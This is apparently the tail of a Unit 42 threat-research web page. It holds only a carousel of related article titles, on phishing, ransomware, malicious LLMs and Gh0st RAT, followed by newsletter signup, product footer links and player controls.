  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2025/08/Insights-icon-white.svg)Insights](https://unit42.paloaltonetworks.com/category/insights/) February 3, 2026 [#### Why Smart People Fall For Phishing Attacks](https://unit42.paloaltonetworks.com/psychology-of-phishing/)

* [AI](https://unit42.paloaltonetworks.com/tag/ai/ "AI")

* [Phishing](https://unit42.paloaltonetworks.com/tag/phishing/ "phishing")  
  [Read now ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/psychology-of-phishing/ "Why Smart People Fall For Phishing Attacks")  
  ![Pictorial representation of threat groups from Russia. The silhouette of a bear and the Ursa constellation inside an orange abstract planet. Abstract, stylized cosmic setting with vibrant blue and purple shapes, representing space and distant planetary bodies.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/01/Ursa-Russia-B-1920x900-1-786x368.png)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2025/08/Insights-icon-white.svg)Insights](https://unit42.paloaltonetworks.com/category/insights/) January 29, 2026 [#### Understanding the Russian Cyberthreat to the 2026 Winter Olympics](https://unit42.paloaltonetworks.com/russian-cyberthreat-2026-winter-olympics/)

* [AI](https://unit42.paloaltonetworks.com/tag/ai/ "AI")

* [IoT](https://unit42.paloaltonetworks.com/tag/iot/ "IoT")

* [Russia](https://unit42.paloaltonetworks.com/tag/russia/ "Russia")  
  [Read now ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/russian-cyberthreat-2026-winter-olympics/ "Understanding the Russian Cyberthreat to the 2026 Winter Olympics")  
  ![Pictorial representation of 01flip ransomware written in Rust. Digital artwork of a pixelated U.S. dollar bill disintegrating into small blocks against a blue data matrix background.](https://unit42.paloaltonetworks.com/wp-content/uploads/2025/12/05_Ransomware_Category_1920x900-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)Threat Research](https://unit42.paloaltonetworks.com/category/threat-research/) December 10, 2025 [#### 01flip: Multi-Platform Ransomware Written in Rust](https://unit42.paloaltonetworks.com/new-ransomware-01flip-written-in-rust/)

* [Bitcoin](https://unit42.paloaltonetworks.com/tag/bitcoin/ "Bitcoin")

* [CL-CRI-103](https://unit42.paloaltonetworks.com/tag/cl-cri-103/ "CL-CRI-103")

* [Cryptocurrency](https://unit42.paloaltonetworks.com/tag/cryptocurrency/ "Cryptocurrency")  
  [Read now ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/new-ransomware-01flip-written-in-rust/ "01flip: Multi-Platform Ransomware Written in Rust")  
  ![Pictorial representation of malicious LLMs. Close-up view of a digital wall displaying various glowing icons, representing a high-tech network interface.](https://unit42.paloaltonetworks.com/wp-content/uploads/2025/11/AdobeStock_1270203474-786x440.jpeg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)Threat Research](https://unit42.paloaltonetworks.com/category/threat-research/) November 25, 2025 [#### The Dual-Use Dilemma of AI: Malicious LLMs](https://unit42.paloaltonetworks.com/dilemma-of-ai-malicious-llms/)

* [Credential Harvesting](https://unit42.paloaltonetworks.com/tag/credential-harvesting/ "Credential Harvesting")

* [Data exfiltration](https://unit42.paloaltonetworks.com/tag/data-exfiltration/ "data exfiltration")

* [LLM](https://unit42.paloaltonetworks.com/tag/llm/ "LLM")  
  [Read now ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/dilemma-of-ai-malicious-llms/ "The Dual-Use Dilemma of AI: Malicious LLMs")  
  ![Pictorial representation of Gh0st RAT malware. A woman analyzes code on a computer screen in an office setting, with another individual working in the background.](https://unit42.paloaltonetworks.com/wp-content/uploads/2025/11/04_Security-Technology_Category_1505x922-718x440.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)Threat Research](https://unit42.paloaltonetworks.com/category/threat-research/) November 14, 2025 [#### Digital Doppelgangers: Anatomy of Evolving Impersonation Campaigns Distributing Gh0st RAT](https://unit42.paloaltonetworks.com/impersonation-campaigns-deliver-gh0st-rat/)

* [DLL Sideloading](https://unit42.paloaltonetworks.com/tag/dll-sideloading/ "DLL Sideloading")

* [Gh0st Rat](https://unit42.paloaltonetworks.com/tag/gh0st-rat/ "Gh0st Rat")

* [PDNS](https://unit42.paloaltonetworks.com/tag/pdns/ "PDNS")  
  [Read now ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/impersonation-campaigns-deliver-gh0st-rat/ "Digital Doppelgangers: Anatomy of Evolving Impersonation Campaigns Distributing Gh0st RAT")

* ![Slider arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/slider-arrow-left.svg)

* ![Slider arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/slider-arrow-left.svg)  
  ![Close button](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/close-modal.svg) ![Enlarged Image]()  
  ![Newsletter](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/03/unit42-footer-subscribe-desktop.png)  
  ![UNIT 42 Small Logo](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/palo-alto-logo-small.svg) Get updates from Unit 42

## Peace of mind comes from staying ahead of threats. Subscribe today.

Your Email

Subscribe for email updates to all Unit 42 threat research.  
By submitting this form, you agree to our [Terms of Use](https://www.paloaltonetworks.com/legal-notices/terms-of-use "Terms of Use") and acknowledge our [Privacy Statement.](https://www.paloaltonetworks.com/legal-notices/privacy "Privacy Statement")

This site is protected by reCAPTCHA and the Google [Privacy Policy](https://policies.google.com/privacy) and [Terms of Service](https://policies.google.com/terms) apply.

Invalid captcha!
Subscribe ![Right Arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/right-arrow.svg) ![loader](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-loader.svg)  
{#footer} Products and Services

* [AI-Powered Network Security Platform](https://www.paloaltonetworks.com/network-security)

* [Secure AI by Design](https://www.paloaltonetworks.com/ai-security)

* [Prisma AIRS](https://www.paloaltonetworks.com/ai-security/prisma-airs)

* [AI Access Security](https://www.paloaltonetworks.com/sase/ai-access-security)

* [Cloud Delivered Security Services](https://www.paloaltonetworks.com/network-security/security-subscriptions)

* [Advanced Threat Prevention](https://www.paloaltonetworks.com/network-security/advanced-threat-prevention)

* [Advanced URL Filtering](https://www.paloaltonetworks.com/network-security/advanced-url-filtering)

* [Advanced WildFire](https://www.paloaltonetworks.com/network-security/advanced-wildfire)

* [Advanced DNS Security](https://www.paloaltonetworks.com/network-security/advanced-dns-security)

* [Enterprise Data Loss Prevention](https://www.paloaltonetworks.com/sase/enterprise-data-loss-prevention)

* [Enterprise IoT Security](https://www.paloaltonetworks.com/network-security/enterprise-device-security)

* [Medical IoT Security](https://www.paloaltonetworks.com/network-security/medical-device-security)

* [Industrial OT Security](https://www.paloaltonetworks.com/network-security/ot-security-solution)

* [SaaS Security](https://www.paloaltonetworks.com/sase/saas-security)

* [Next-Generation Firewalls](https://www.paloaltonetworks.com/network-security/next-generation-firewall)

* [Hardware Firewalls](https://www.paloaltonetworks.com/network-security/hardware-firewall-innovations)

* [Software Firewalls](https://www.paloaltonetworks.com/network-security/software-firewalls)

* [Strata Cloud Manager](https://www.paloaltonetworks.com/network-security/strata-cloud-manager)

* [SD-WAN for NGFW](https://www.paloaltonetworks.com/network-security/sd-wan-subscription)

* [PAN-OS](https://www.paloaltonetworks.com/network-security/pan-os)

* [Panorama](https://www.paloaltonetworks.com/network-security/panorama)

* [Secure Access Service Edge](https://www.paloaltonetworks.com/sase)

* [Prisma SASE](https://www.paloaltonetworks.com/sase)

* [Application Acceleration](https://www.paloaltonetworks.com/sase/app-acceleration)

* [Autonomous Digital Experience Management](https://www.paloaltonetworks.com/sase/adem)

* [Enterprise DLP](https://www.paloaltonetworks.com/sase/enterprise-data-loss-prevention)

* [Prisma Access](https://www.paloaltonetworks.com/sase/access)

* [Prisma Browser](https://www.paloaltonetworks.com/sase/prisma-browser)

* [Prisma SD-WAN](https://www.paloaltonetworks.com/sase/sd-wan)

* [Remote Browser Isolation](https://www.paloaltonetworks.com/sase/remote-browser-isolation)

* [SaaS Security](https://www.paloaltonetworks.com/sase/saas-security)

* [AI-Driven Security Operations Platform](https://www.paloaltonetworks.com/cortex)

* [Cloud Security](https://www.paloaltonetworks.com/cortex/cloud)

* [Cortex Cloud](https://www.paloaltonetworks.com/cortex/cloud)

* [Application Security](https://www.paloaltonetworks.com/cortex/cloud/application-security)

* [Cloud Posture Security](https://www.paloaltonetworks.com/cortex/cloud/cloud-posture-security)

* [Cloud Runtime Security](https://www.paloaltonetworks.com/cortex/cloud/runtime-security)

* [Prisma Cloud](https://www.paloaltonetworks.com/prisma/cloud)

* [AI-Driven SOC](https://www.paloaltonetworks.com/cortex)

* [Cortex XSIAM](https://www.paloaltonetworks.com/cortex/cortex-xsiam)

* [Cortex XDR](https://www.paloaltonetworks.com/cortex/cortex-xdr)

* [Cortex XSOAR](https://www.paloaltonetworks.com/cortex/cortex-xsoar)

* [Cortex Xpanse](https://www.paloaltonetworks.com/cortex/cortex-xpanse)

* [Unit 42 Managed Detection \& Response](https://www.paloaltonetworks.com/cortex/managed-detection-and-response)

* [Managed XSIAM](https://www.paloaltonetworks.com/cortex/managed-xsiam)

* [Next-Generation Identity Security](https://www.paloaltonetworks.com/idira)

* [Privileged Access Management](https://www.paloaltonetworks.com/idira/human/privileged-access-management)

* [Identity and Access Management](https://www.paloaltonetworks.com/idira/human/identity-and-access-management)

* [Endpoint Privilege Manager](https://www.paloaltonetworks.com/idira/human/endpoint-privilege-manager)

* [Identity Governance](https://www.paloaltonetworks.com/idira/human/identity-governance)

* [Workforce Password Management](https://www.paloaltonetworks.com/idira/human/workforce-password-management)

* [Agentic Identities](https://www.paloaltonetworks.com/idira/agentic)

* [Secrets Management](https://www.paloaltonetworks.com/idira/machine/secrets-management)

* [Unified Secrets Governance](https://www.paloaltonetworks.com/idira/machine/unified-secrets-governance)

* [Application Credentials Delivery](https://www.paloaltonetworks.com/idira/machine/application-credentials-delivery)

* [Vendor Privileged Access](https://www.paloaltonetworks.com/idira/human/vendor-privileged-access)

* [Threat Intel and Incident Response Services](https://www.paloaltonetworks.com/unit42)

* [Prepare for Emerging Risks](https://www.paloaltonetworks.com/unit42/frontier-ai-defense)

* [Strengthen Your Defenses](https://www.paloaltonetworks.com/unit42/strengthen-your-defenses)

* [Build Your Security Strategy](https://www.paloaltonetworks.com/unit42/build-your-security-strategy)

* [Understand the Adversary](https://www.paloaltonetworks.com/unit42/threat-intelligence)

* [Respond to a Cyber Attack](https://www.paloaltonetworks.com/unit42/respond)  
  Company

* [About Us](https://www.paloaltonetworks.com/about-us)

* [Careers](https://jobs.paloaltonetworks.com/en/)

* [Contact Us](https://www.paloaltonetworks.com/company/contact-sales)

* [Corporate Responsibility](https://www.paloaltonetworks.com/about-us/corporate-responsibility)

* [Customers](https://www.paloaltonetworks.com/customers)

* [Investor Relations](https://investors.paloaltonetworks.com/)

* [Location](https://www.paloaltonetworks.com/about-us/locations)

* [Newsroom](https://www.paloaltonetworks.com/company/newsroom)  
  Popular Links

* [Blog](https://www.paloaltonetworks.com/blog/)

* [Communities](https://www.paloaltonetworks.com/communities)

* [Content Library](https://www.paloaltonetworks.com/resources)

* [Cyberpedia](https://www.paloaltonetworks.com/cyberpedia)

* [Event Center](https://events.paloaltonetworks.com/)

* [Manage Email Preferences](https://start.paloaltonetworks.com/preference-center)

* [Products A-Z](https://www.paloaltonetworks.com/products/products-a-z)

* [Product Certifications](https://www.paloaltonetworks.com/legal-notices/trust-center/certifications)

* [Report a Vulnerability](https://www.paloaltonetworks.com/security-disclosure)

* [Sitemap](https://www.paloaltonetworks.com/sitemap)

* [Tech Docs](https://docs.paloaltonetworks.com/)

* [Unit 42](https://unit42.paloaltonetworks.com/)

* [Do Not Sell or Share My Personal Information](https://panwedd.exterro.net/portal/dsar.htm?target=panwedd)
  ![Palo Alto Networks Logo](https://www.paloaltonetworks.com/etc/clientlibs/clean/imgs/pan-logo-dark.svg)

* [Privacy](https://www.paloaltonetworks.com/legal-notices/privacy)

* [Trust Center](https://www.paloaltonetworks.com/legal-notices/trust-center)

* [Terms of Use](https://www.paloaltonetworks.com/legal-notices/terms-of-use)

* [Documents](https://www.paloaltonetworks.com/legal)

Copyright © 2026 Palo Alto Networks. All Rights Reserved

* [![Youtube](https://www.paloaltonetworks.com/etc/clientlibs/clean/imgs/social/youtube-black.svg)](https://www.youtube.com/user/paloaltonetworks)
* [![Podcast](https://www.paloaltonetworks.com/content/dam/pan/en_US/images/icons/podcast.svg)](https://www.paloaltonetworks.com/podcasts/threat-vector)
* [![Facebook](https://www.paloaltonetworks.com/etc/clientlibs/clean/imgs/social/facebook-black.svg)](https://www.facebook.com/PaloAltoNetworks/)
* [![LinkedIn](https://www.paloaltonetworks.com/etc/clientlibs/clean/imgs/social/linkedin-black.svg)](https://www.linkedin.com/company/palo-alto-networks)
* [![Twitter](https://www.paloaltonetworks.com/etc/clientlibs/clean/imgs/social/twitter-x-black.svg)](https://twitter.com/PaloAltoNtwks)
* EN  
  Select your language  
  ![Play](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/player-play-icon.svg) ![Pause](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/player-pause-icon1.svg) ![Minimize](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-minimize.svg) ![Close button](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/close-modal.svg)

### Default Heading

Read the article ![Right Arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/right-arrow.svg)  
Seekbar

![Play](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/player-play-icon.svg) ![Pause](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/player-pause-icon1.svg)  
![Volume](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-volume.svg)  
Volume
![Minimize](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-minimize.svg)
